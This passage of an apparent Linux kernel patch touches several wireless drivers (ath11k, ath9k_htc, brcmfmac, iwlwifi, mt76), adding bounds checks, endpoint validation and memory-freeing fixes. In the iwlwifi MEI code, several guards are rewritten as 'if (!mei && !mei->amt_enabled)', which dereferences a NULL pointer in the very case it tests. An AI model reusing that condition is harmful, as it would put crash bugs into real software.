+-		switch (sta->deflink.bandwidth) {
+-		case IEEE80211_STA_RX_BW_20:
+-			bw = WMI_PEER_CHWIDTH_20MHZ;
+-			break;
+-		case IEEE80211_STA_RX_BW_40:
+-			bw = WMI_PEER_CHWIDTH_40MHZ;
+-			break;
+-		case IEEE80211_STA_RX_BW_80:
+-			bw = WMI_PEER_CHWIDTH_80MHZ;
+-			break;
+-		case IEEE80211_STA_RX_BW_160:
+-			bw = WMI_PEER_CHWIDTH_160MHZ;
+-			break;
+-		default:
+-			ath11k_warn(ar->ab, "Invalid bandwidth %d in rc update for %pM\n",
+-				    sta->deflink.bandwidth, sta->addr);
+-			bw = WMI_PEER_CHWIDTH_20MHZ;
+-			break;
+-		}
+-
++		bw = ath11k_mac_ieee80211_sta_bw_to_wmi(ar, sta);
++		arsta->bw_prev = arsta->bw;
+ 		arsta->bw = bw;
+ 	}
+ 
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 51de2208b7899..8358fe08c2344 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -3087,6 +3087,9 @@ static const struct qmi_msg_handler ath11k_qmi_msg_handlers[] = {
+ 			sizeof(struct qmi_wlfw_fw_init_done_ind_msg_v01),
+ 		.fn = ath11k_qmi_msg_fw_init_done_cb,
+ 	},
++
++	/* end of list */
++	{},
+ };
+ 
+ static int ath11k_qmi_ops_new_server(struct qmi_handle *qmi_hdl,
+diff --git a/drivers/net/wireless/ath/ath9k/hif_usb.c b/drivers/net/wireless/ath/ath9k/hif_usb.c
+index 4d9002a9d082c..1a2e0c7eeb023 100644
+--- a/drivers/net/wireless/ath/ath9k/hif_usb.c
++++ b/drivers/net/wireless/ath/ath9k/hif_usb.c
+@@ -708,14 +708,13 @@ static void ath9k_hif_usb_reg_in_cb(struct urb *urb)
+ 	struct rx_buf *rx_buf = (struct rx_buf *)urb->context;
+ 	struct hif_device_usb *hif_dev = rx_buf->hif_dev;
+ 	struct sk_buff *skb = rx_buf->skb;
+-	struct sk_buff *nskb;
+ 	int ret;
+ 
+ 	if (!skb)
+ 		return;
+ 
+ 	if (!hif_dev)
+-		goto free;
++		goto free_skb;
+ 
+ 	switch (urb->status) {
+ 	case 0:
+@@ -724,7 +723,7 @@ static void ath9k_hif_usb_reg_in_cb(struct urb *urb)
+ 	case -ECONNRESET:
+ 	case -ENODEV:
+ 	case -ESHUTDOWN:
+-		goto free;
++		goto free_skb;
+ 	default:
+ 		skb_reset_tail_pointer(skb);
+ 		skb_trim(skb, 0);
+@@ -735,25 +734,27 @@ static void ath9k_hif_usb_reg_in_cb(struct urb *urb)
+ 	if (likely(urb->actual_length != 0)) {
+ 		skb_put(skb, urb->actual_length);
+ 
+-		/* Process the command first */
++		/*
++		 * Process the command first.
++		 * skb is either freed here or passed to be
++		 * managed to another callback function.
++		 */
+ 		ath9k_htc_rx_msg(hif_dev->htc_handle, skb,
+ 				 skb->len, USB_REG_IN_PIPE);
+ 
+-
+-		nskb = alloc_skb(MAX_REG_IN_BUF_SIZE, GFP_ATOMIC);
+-		if (!nskb) {
++		skb = alloc_skb(MAX_REG_IN_BUF_SIZE, GFP_ATOMIC);
++		if (!skb) {
+ 			dev_err(&hif_dev->udev->dev,
+ 				"ath9k_htc: REG_IN memory allocation failure\n");
+-			urb->context = NULL;
+-			return;
++			goto free_rx_buf;
+ 		}
+ 
+-		rx_buf->skb = nskb;
++		rx_buf->skb = skb;
+ 
+ 		usb_fill_int_urb(urb, hif_dev->udev,
+ 				 usb_rcvintpipe(hif_dev->udev,
+ 						 USB_REG_IN_PIPE),
+-				 nskb->data, MAX_REG_IN_BUF_SIZE,
++				 skb->data, MAX_REG_IN_BUF_SIZE,
+ 				 ath9k_hif_usb_reg_in_cb, rx_buf, 1);
+ 	}
+ 
+@@ -762,12 +763,13 @@ resubmit:
+ 	ret = usb_submit_urb(urb, GFP_ATOMIC);
+ 	if (ret) {
+ 		usb_unanchor_urb(urb);
+-		goto free;
++		goto free_skb;
+ 	}
+ 
+ 	return;
+-free:
++free_skb:
+ 	kfree_skb(skb);
++free_rx_buf:
+ 	kfree(rx_buf);
+ 	urb->context = NULL;
+ }
+@@ -780,14 +782,10 @@ static void ath9k_hif_usb_dealloc_tx_urbs(struct hif_device_usb *hif_dev)
+ 	spin_lock_irqsave(&hif_dev->tx.tx_lock, flags);
+ 	list_for_each_entry_safe(tx_buf, tx_buf_tmp,
+ 				 &hif_dev->tx.tx_buf, list) {
+-		usb_get_urb(tx_buf->urb);
+-		spin_unlock_irqrestore(&hif_dev->tx.tx_lock, flags);
+-		usb_kill_urb(tx_buf->urb);
+ 		list_del(&tx_buf->list);
+ 		usb_free_urb(tx_buf->urb);
+ 		kfree(tx_buf->buf);
+ 		kfree(tx_buf);
+-		spin_lock_irqsave(&hif_dev->tx.tx_lock, flags);
+ 	}
+ 	spin_unlock_irqrestore(&hif_dev->tx.tx_lock, flags);
+ 
+@@ -1329,10 +1327,24 @@ static int send_eject_command(struct usb_interface *interface)
+ static int ath9k_hif_usb_probe(struct usb_interface *interface,
+ 			       const struct usb_device_id *id)
+ {
++	struct usb_endpoint_descriptor *bulk_in, *bulk_out, *int_in, *int_out;
+ 	struct usb_device *udev = interface_to_usbdev(interface);
++	struct usb_host_interface *alt;
+ 	struct hif_device_usb *hif_dev;
+ 	int ret = 0;
+ 
++	/* Verify the expected endpoints are present */
++	alt = interface->cur_altsetting;
++	if (usb_find_common_endpoints(alt, &bulk_in, &bulk_out, &int_in, &int_out) < 0 ||
++	    usb_endpoint_num(bulk_in) != USB_WLAN_RX_PIPE ||
++	    usb_endpoint_num(bulk_out) != USB_WLAN_TX_PIPE ||
++	    usb_endpoint_num(int_in) != USB_REG_IN_PIPE ||
++	    usb_endpoint_num(int_out) != USB_REG_OUT_PIPE) {
++		dev_err(&udev->dev,
++			"ath9k_htc: Device endpoint numbers are not the expected ones\n");
++		return -ENODEV;
++	}
++
+ 	if (id->driver_info == STORAGE_DEVICE)
+ 		return send_eject_command(interface);
+ 
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+index 74020fa100659..22344e68fd597 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/common.c
+@@ -305,8 +305,12 @@ int brcmf_c_preinit_dcmds(struct brcmf_if *ifp)
+ 	brcmf_info("Firmware: %s %s\n", ri->chipname, buf);
+ 
+ 	/* locate firmware version number for ethtool */
+-	ptr = strrchr(buf, ' ') + 1;
+-	strscpy(ifp->drvr->fwver, ptr, sizeof(ifp->drvr->fwver));
++	ptr = strrchr(buf, ' ');
++	if (!ptr) {
++		bphy_err(drvr, "Retrieving version number failed");
++		goto done;
++	}
++	strscpy(ifp->drvr->fwver, ptr + 1, sizeof(ifp->drvr->fwver));
+ 
+ 	/* Query for 'clmver' to get CLM version info from firmware */
+ 	memset(buf, 0, sizeof(buf));
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c
+index f2207793f6e27..09d2f2dc2b46f 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/firmware.c
+@@ -803,6 +803,11 @@ brcmf_fw_alloc_request(u32 chip, u32 chiprev,
+ 	u32 i, j;
+ 	char end = '\0';
+ 
++	if (chiprev >= BITS_PER_TYPE(u32)) {
++		brcmf_err("Invalid chip revision %u\n", chiprev);
++		return NULL;
++	}
++
+ 	for (i = 0; i < table_size; i++) {
+ 		if (mapping_table[i].chipid == chip &&
+ 		    mapping_table[i].revmask & BIT(chiprev))
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 80083f9ea3116..5630f6e718e12 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -726,7 +726,7 @@ static int brcmf_pcie_exit_download_state(struct brcmf_pciedev_info *devinfo,
+ 	}
+ 
+ 	if (!brcmf_chip_set_active(devinfo->ci, resetintr))
+-		return -EINVAL;
++		return -EIO;
+ 	return 0;
+ }
+ 
+@@ -1218,6 +1218,10 @@ static int brcmf_pcie_init_ringbuffers(struct brcmf_pciedev_info *devinfo)
+ 				BRCMF_NROF_H2D_COMMON_MSGRINGS;
+ 		max_completionrings = BRCMF_NROF_D2H_COMMON_MSGRINGS;
+ 	}
++	if (max_flowrings > 256) {
++		brcmf_err(bus, "invalid max_flowrings(%d)\n", max_flowrings);
++		return -EIO;
++	}
+ 
+ 	if (devinfo->dma_idx_sz != 0) {
+ 		bufsz = (max_submissionrings + max_completionrings) *
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c
+index 465d95d837592..e265a2e411a09 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/sdio.c
+@@ -3414,6 +3414,7 @@ static int brcmf_sdio_download_firmware(struct brcmf_sdio *bus,
+ 	/* Take arm out of reset */
+ 	if (!brcmf_chip_set_active(bus->ci, rstvec)) {
+ 		brcmf_err("error getting out of ARM core reset\n");
++		bcmerror = -EIO;
+ 		goto err;
+ 	}
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h b/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h
+index 67122cfa22920..5409699c9a1fd 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h
++++ b/drivers/net/wireless/intel/iwlwifi/mei/iwl-mei.h
+@@ -446,9 +446,10 @@ void iwl_mei_host_associated(const struct iwl_mei_conn_info *conn_info,
+ void iwl_mei_host_disassociated(void);
+ 
+ /**
+- * iwl_mei_device_down() - must be called when the device is down
++ * iwl_mei_device_state() - must be called when the device changes up/down state
++ * @up: true if the device is up, false otherwise.
+  */
+-void iwl_mei_device_down(void);
++void iwl_mei_device_state(bool up);
+ 
+ #else
+ 
+@@ -497,7 +498,7 @@ static inline void iwl_mei_host_associated(const struct iwl_mei_conn_info *conn_
+ static inline void iwl_mei_host_disassociated(void)
+ {}
+ 
+-static inline void iwl_mei_device_down(void)
++static inline void iwl_mei_device_state(bool up)
+ {}
+ 
+ #endif /* CONFIG_IWLMEI */
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/main.c b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+index 357f14626cf43..c0142093c7682 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/main.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/main.c
+@@ -147,9 +147,13 @@ struct iwl_mei_filters {
+  *	to send CSME_OWNERSHIP_CONFIRMED when the driver completes its down
+  *	flow.
+  * @link_prot_state: true when we are in link protection PASSIVE
++ * @device_down: true if the device is down. Used to remember to send
++ *	CSME_OWNERSHIP_CONFIRMED when the driver is already down.
+  * @csa_throttle_end_wk: used when &csa_throttled is true
+  * @data_q_lock: protects the access to the data queues which are
+  *	accessed without the mutex.
++ * @netdev_work: used to defer registering and unregistering of the netdev to
++ *	avoid taking the rtnl lock in the SAP messages handlers.
+  * @sap_seq_no: the sequence number for the SAP messages
+  * @seq_no: the sequence number for the SAP messages
+  * @dbgfs_dir: the debugfs dir entry
+@@ -167,8 +171,10 @@ struct iwl_mei {
+ 	bool csa_throttled;
+ 	bool csme_taking_ownership;
+ 	bool link_prot_state;
++	bool device_down;
+ 	struct delayed_work csa_throttle_end_wk;
+ 	spinlock_t data_q_lock;
++	struct work_struct netdev_work;
+ 
+ 	atomic_t sap_seq_no;
+ 	atomic_t seq_no;
+@@ -588,13 +594,38 @@ static rx_handler_result_t iwl_mei_rx_handler(struct sk_buff **pskb)
+ 	return res;
+ }
+ 
++static void iwl_mei_netdev_work(struct work_struct *wk)
++{
++	struct iwl_mei *mei =
++		container_of(wk, struct iwl_mei, netdev_work);
++	struct net_device *netdev;
++
++	/*
++	 * First take rtnl and only then the mutex to avoid an ABBA
++	 * with iwl_mei_set_netdev()
++	 */
++	rtnl_lock();
++	mutex_lock(&iwl_mei_mutex);
++
++	netdev = rcu_dereference_protected(iwl_mei_cache.netdev,
++					   lockdep_is_held(&iwl_mei_mutex));
++	if (netdev) {
++		if (mei->amt_enabled)
++			netdev_rx_handler_register(netdev, iwl_mei_rx_handler,
++						   mei);
++		else
++			netdev_rx_handler_unregister(netdev);
++	}
++
++	mutex_unlock(&iwl_mei_mutex);
++	rtnl_unlock();
++}
++
+ static void
+ iwl_mei_handle_rx_start_ok(struct mei_cl_device *cldev,
+ 			   const struct iwl_sap_me_msg_start_ok *rsp,
+ 			   ssize_t len)
+ {
+-	struct iwl_mei *mei = mei_cldev_get_drvdata(cldev);
+-
+ 	if (len != sizeof(*rsp)) {
+ 		dev_err(&cldev->dev,
+ 			"got invalid SAP_ME_MSG_START_OK from CSME firmware\n");
+@@ -613,13 +644,10 @@ iwl_mei_handle_rx_start_ok(struct mei_cl_device *cldev,
+ 
+ 	mutex_lock(&iwl_mei_mutex);
+ 	set_bit(IWL_MEI_STATUS_SAP_CONNECTED, &iwl_mei_status);
+-	/* wifi driver has registered already */
+-	if (iwl_mei_cache.ops) {
+-		iwl_mei_send_sap_msg(mei->cldev,
+-				     SAP_MSG_NOTIF_WIFIDR_UP);
+-		iwl_mei_cache.ops->sap_connected(iwl_mei_cache.priv);
+-	}
+-
++	/*
++	 * We'll receive AMT_STATE SAP message in a bit and
++	 * that will continue the flow
++	 */
+ 	mutex_unlock(&iwl_mei_mutex);
+ }
+ 
+@@ -712,6 +740,13 @@ static void iwl_mei_set_init_conf(struct iwl_mei *mei)
+ 		.val = cpu_to_le32(iwl_mei_cache.rf_kill),
+ 	};
+ 
++	/* wifi driver has registered already */
++	if (iwl_mei_cache.ops) {
++		iwl_mei_send_sap_msg(mei->cldev,
++				     SAP_MSG_NOTIF_WIFIDR_UP);
++		iwl_mei_cache.ops->sap_connected(iwl_mei_cache.priv);
++	}
++
+ 	iwl_mei_send_sap_msg(mei->cldev, SAP_MSG_NOTIF_WHO_OWNS_NIC);
+ 
+ 	if (iwl_mei_cache.conn_info) {
+@@ -738,38 +773,23 @@ static void iwl_mei_handle_amt_state(struct mei_cl_device *cldev,
+ 				     const struct iwl_sap_msg_dw *dw)
+ {
+ 	struct iwl_mei *mei = mei_cldev_get_drvdata(cldev);
+-	struct net_device *netdev;
+ 
+-	/*
+-	 * First take rtnl and only then the mutex to avoid an ABBA
+-	 * with iwl_mei_set_netdev()
+-	 */
+-	rtnl_lock();
+ 	mutex_lock(&iwl_mei_mutex);
+ 
+-	netdev = rcu_dereference_protected(iwl_mei_cache.netdev,
+-					   lockdep_is_held(&iwl_mei_mutex));
+-
+ 	if (mei->amt_enabled == !!le32_to_cpu(dw->val))
+ 		goto out;
+ 
+ 	mei->amt_enabled = dw->val;
+ 
+-	if (mei->amt_enabled) {
+-		if (netdev)
+-			netdev_rx_handler_register(netdev, iwl_mei_rx_handler, mei);
+-
++	if (mei->amt_enabled)
+ 		iwl_mei_set_init_conf(mei);
+-	} else {
+-		if (iwl_mei_cache.ops)
+-			iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false);
+-		if (netdev)
+-			netdev_rx_handler_unregister(netdev);
+-	}
++	else if (iwl_mei_cache.ops)
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, false, false);
++
++	schedule_work(&mei->netdev_work);
+ 
+ out:
+ 	mutex_unlock(&iwl_mei_mutex);
+-	rtnl_unlock();
+ }
+ 
+ static void iwl_mei_handle_nic_owner(struct mei_cl_device *cldev,
+@@ -798,14 +818,18 @@ static void iwl_mei_handle_csme_taking_ownership(struct mei_cl_device *cldev,
+ 
+ 	mei->got_ownership = false;
+ 
+-	/*
+-	 * Remember to send CSME_OWNERSHIP_CONFIRMED when the wifi driver
+-	 * is finished taking the device down.
+-	 */
+-	mei->csme_taking_ownership = true;
++	if (iwl_mei_cache.ops && !mei->device_down) {
++		/*
++		 * Remember to send CSME_OWNERSHIP_CONFIRMED when the wifi
++		 * driver is finished taking the device down.
++		 */
++		mei->csme_taking_ownership = true;
+ 
+-	if (iwl_mei_cache.ops)
+-		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true);
++		iwl_mei_cache.ops->rfkill(iwl_mei_cache.priv, true, true);
++	} else {
++		iwl_mei_send_sap_msg(cldev,
++				     SAP_MSG_NOTIF_CSME_OWNERSHIP_CONFIRMED);
++	}
+ }
+ 
+ static void iwl_mei_handle_nvm(struct mei_cl_device *cldev,
+@@ -1413,10 +1437,7 @@ void iwl_mei_host_associated(const struct iwl_mei_conn_info *conn_info,
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
+-		goto out;
+-
+-	if (!mei->amt_enabled)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1445,7 +1466,7 @@ void iwl_mei_host_disassociated(void)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1481,7 +1502,7 @@ void iwl_mei_set_rfkill_state(bool hw_rfkill, bool sw_rfkill)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1510,7 +1531,7 @@ void iwl_mei_set_nic_info(const u8 *mac_address, const u8 *nvm_address)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1538,7 +1559,7 @@ void iwl_mei_set_country_code(u16 mcc)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg_payload(mei->cldev, &msg.hdr);
+@@ -1564,7 +1585,7 @@ void iwl_mei_set_power_limit(const __le16 *power_limit)
+ 
+ 	mei = mei_cldev_get_drvdata(iwl_mei_global_cldev);
+ 
+-	if (!mei)
++	if (!mei && !mei->amt_enabled)
+ 		goto out;
+ 
+ 	memcpy(msg.sar_chain_info_table, power_limit, sizeof(msg.sar_chain_info_table));
+@@ -1616,7 +1637,7 @@ out:
+ }
+ EXPORT_SYMBOL_GPL(iwl_mei_set_netdev);
+ 
+-void iwl_mei_device_down(void)
++void iwl_mei_device_state(bool up)
+ {
+ 	struct iwl_mei *mei;
+ 
+@@ -1630,7 +1651,9 @@ void iwl_mei_device_down(void)
+ 	if (!mei)
+ 		goto out;
+ 
+-	if (!mei->csme_taking_ownership)
++	mei->device_down = !up;
++
++	if (up || !mei->csme_taking_ownership)
+ 		goto out;
+ 
+ 	iwl_mei_send_sap_msg(mei->cldev,
+@@ -1639,7 +1662,7 @@ void iwl_mei_device_down(void)
+ out:
+ 	mutex_unlock(&iwl_mei_mutex);
+ }
+-EXPORT_SYMBOL_GPL(iwl_mei_device_down);
++EXPORT_SYMBOL_GPL(iwl_mei_device_state);
+ 
+ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ {
+@@ -1669,9 +1692,10 @@ int iwl_mei_register(void *priv, const struct iwl_mei_ops *ops)
+ 
+ 		/* we have already a SAP connection */
+ 		if (iwl_mei_is_connected()) {
+-			iwl_mei_send_sap_msg(mei->cldev,
+-					     SAP_MSG_NOTIF_WIFIDR_UP);
+-			ops->rfkill(priv, mei->link_prot_state);
++			if (mei->amt_enabled)
++				iwl_mei_send_sap_msg(mei->cldev,
++						     SAP_MSG_NOTIF_WIFIDR_UP);
++			ops->rfkill(priv, mei->link_prot_state, false);
+ 		}
+ 	}
+ 	ret = 0;
+@@ -1818,9 +1842,11 @@ static int iwl_mei_probe(struct mei_cl_device *cldev,
+ 			  iwl_mei_csa_throttle_end_wk);
+ 	init_waitqueue_head(&mei->get_ownership_wq);
+ 	spin_lock_init(&mei->data_q_lock);
++	INIT_WORK(&mei->netdev_work, iwl_mei_netdev_work);
+ 
+ 	mei_cldev_set_drvdata(cldev, mei);
+ 	mei->cldev = cldev;
++	mei->device_down = true;
+ 
+ 	do {
+ 		ret = iwl_mei_alloc_shared_mem(cldev);
+@@ -1921,29 +1947,32 @@ static void iwl_mei_remove(struct mei_cl_device *cldev)
+ 
+ 	mutex_lock(&iwl_mei_mutex);
+ 
+-	/*
+-	 * Tell CSME that we are going down so that it won't access the
+-	 * memory anymore, make sure this message goes through immediately.
+-	 */
+-	mei->csa_throttled = false;
+-	iwl_mei_send_sap_msg(mei->cldev,
+-			     SAP_MSG_NOTIF_HOST_GOES_DOWN);
++	if (mei->amt_enabled) {
++		/*
++		 * Tell CSME that we are going down so that it won't access the
++		 * memory anymore, make sure this message goes through immediately.
++		 */
++		mei->csa_throttled = false;
++		iwl_mei_send_sap_msg(mei->cldev,
++				     SAP_MSG_NOTIF_HOST_GOES_DOWN);
+ 
+-	for (i = 0; i < SEND_SAP_MAX_WAIT_ITERATION; i++) {
+-		if (!iwl_mei_host_to_me_data_pending(mei))
+-			break;
++		for (i = 0; i < SEND_SAP_MAX_WAIT_ITERATION; i++) {
++			if (!iwl_mei_host_to_me_data_pending(mei))
++				break;
+ 
+-		msleep(5);
+-	}
++			msleep(20);
++		}
+ 
+-	/*
+-	 * If we couldn't make sure that CSME saw the HOST_GOES_DOWN message,
+-	 * it means that it will probably keep reading memory that we are going
+-	 * to unmap and free, expect IOMMU error messages.
+-	 */
+-	if (i == SEND_SAP_MAX_WAIT_ITERATION)
+-		dev_err(&mei->cldev->dev,
+-			"Couldn't get ACK from CSME on HOST_GOES_DOWN message\n");
++		/*
++		 * If we couldn't make sure that CSME saw the HOST_GOES_DOWN
++		 * message, it means that it will probably keep reading memory
++		 * that we are going to unmap and free, expect IOMMU error
++		 * messages.
++		 */
++		if (i == SEND_SAP_MAX_WAIT_ITERATION)
++			dev_err(&mei->cldev->dev,
++				"Couldn't get ACK from CSME on HOST_GOES_DOWN message\n");
++	}
+ 
+ 	mutex_unlock(&iwl_mei_mutex);
+ 
+@@ -1976,6 +2005,7 @@ static void iwl_mei_remove(struct mei_cl_device *cldev)
+ 	 */
+ 	cancel_work_sync(&mei->send_csa_msg_wk);
+ 	cancel_delayed_work_sync(&mei->csa_throttle_end_wk);
++	cancel_work_sync(&mei->netdev_work);
+ 
+ 	/*
+ 	 * If someone waits for the ownership, let him know that we are going
+diff --git a/drivers/net/wireless/intel/iwlwifi/mei/net.c b/drivers/net/wireless/intel/iwlwifi/mei/net.c
+index 3472167c83707..eac46d1a397a8 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mei/net.c
++++ b/drivers/net/wireless/intel/iwlwifi/mei/net.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ /*
+- * Copyright (C) 2021 Intel Corporation
++ * Copyright (C) 2021-2022 Intel Corporation
+  */
+ 
+ #include <uapi/linux/if_ether.h>
+@@ -337,10 +337,14 @@ rx_handler_result_t iwl_mei_rx_filter(struct sk_buff *orig_skb,
+ 	if (!*pass_to_csme)
+ 		return RX_HANDLER_PASS;
+ 
+-	if (ret == RX_HANDLER_PASS)
++	if (ret == RX_HANDLER_PASS) {
+ 		skb = skb_copy(orig_skb, GFP_ATOMIC);
+-	else
++
++		if (!skb)
++			return RX_HANDLER_PASS;
++	} else {
+ 		skb = orig_skb;
++	}
+ 
+ 	/* CSME wants the MAC header as well, push it back */
+ 	skb_push(skb, skb->data - skb_mac_header(skb));
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index f041e77af059e..5de34edc51fe9 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -1665,6 +1665,8 @@ int iwl_mvm_up(struct iwl_mvm *mvm)
+ 			iwl_rfi_send_config_cmd(mvm, NULL);
+ 	}
+ 
++	iwl_mvm_mei_device_state(mvm, true);
++
+ 	IWL_DEBUG_INFO(mvm, "RT uCode started.\n");
+ 	return 0;
+  error:
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+index 97cba526e4651..1ccb3cad7cdc1 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mvm.h
+@@ -2201,10 +2201,10 @@ static inline void iwl_mvm_mei_host_disassociated(struct iwl_mvm *mvm)
+ 		iwl_mei_host_disassociated();
+ }
+ 
+-static inline void iwl_mvm_mei_device_down(struct iwl_mvm *mvm)
++static inline void iwl_mvm_mei_device_state(struct iwl_mvm *mvm, bool up)
+ {
+ 	if (mvm->mei_registered)
+-		iwl_mei_device_down();
++		iwl_mei_device_state(up);
+ }
+ 
+ static inline void iwl_mvm_mei_set_sw_rfkill_state(struct iwl_mvm *mvm)
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index d2d42cd48af22..5b8e9a06f6d4a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1375,7 +1375,7 @@ void iwl_mvm_stop_device(struct iwl_mvm *mvm)
+ 	iwl_trans_stop_device(mvm->trans);
+ 	iwl_free_fw_paging(&mvm->fwrt);
+ 	iwl_fw_dump_conf_clear(&mvm->fwrt);
+-	iwl_mvm_mei_device_down(mvm);
++	iwl_mvm_mei_device_state(mvm, false);
+ }
+ 
+ static void iwl_op_mode_mvm_stop(struct iwl_op_mode *op_mode)
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index 86d20e13bf47a..ba944175546d4 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -1171,9 +1171,15 @@ static int iwl_mvm_tx_mpdu(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	/* From now on, we cannot access info->control */
+ 	iwl_mvm_skb_prepare_status(skb, dev_cmd);
+ 
++	/*
++	 * The IV is introduced by the HW for new tx api, and it is not present
++	 * in the skb, hence, don't tell iwl_mvm_mei_tx_copy_to_csme about the
++	 * IV for those devices.
++	 */
+ 	if (ieee80211_is_data(fc))
+ 		iwl_mvm_mei_tx_copy_to_csme(mvm, skb,
+-					    info->control.hw_key ?
++					    info->control.hw_key &&
++					    !iwl_mvm_has_new_tx_api(mvm) ?
+ 					    info->control.hw_key->iv_len : 0);
+ 
+ 	if (iwl_trans_tx(mvm->trans, skb, dev_cmd, txq_id))
+@@ -1206,6 +1212,7 @@ int iwl_mvm_tx_skb_sta(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 	struct sk_buff_head mpdus_skbs;
+ 	unsigned int payload_len;
+ 	int ret;
++	struct sk_buff *orig_skb = skb;
+ 
+ 	if (WARN_ON_ONCE(!mvmsta))
+ 		return -1;
+@@ -1238,8 +1245,17 @@ int iwl_mvm_tx_skb_sta(struct iwl_mvm *mvm, struct sk_buff *skb,
+ 
+ 		ret = iwl_mvm_tx_mpdu(mvm, skb, &info, sta);
+ 		if (ret) {
++			/* Free skbs created as part of TSO logic that have not yet been dequeued */
+ 			__skb_queue_purge(&mpdus_skbs);
+-			return ret;
++			/* skb here is not necessarily same as skb that entered this method,
++			 * so free it explicitly.
++			 */
++			if (skb == orig_skb)
++				ieee80211_free_txskb(mvm->hw, skb);
++			else
++				kfree_skb(skb);
++			/* there was error, but we consumed skb one way or another, so return 0 */
++			return 0;
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 87db9498dea44..7bcf7a6b67df3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -1107,8 +1107,9 @@ static inline bool mt76_is_skb_pktid(u8 pktid)
+ static inline u8 mt76_tx_power_nss_delta(u8 nss)
+ {
+ 	static const u8 nss_delta[4] = { 0, 6, 9, 12 };
++	u8 idx = nss - 1;
+ 
+-	return nss_delta[nss - 1];
++	return (idx < ARRAY_SIZE(nss_delta)) ? nss_delta[idx] : 0;
+ }
+ 
+ static inline bool mt76_testmode_enabled(struct mt76_phy *phy)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 011fc9729b38c..025a237c1cce8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
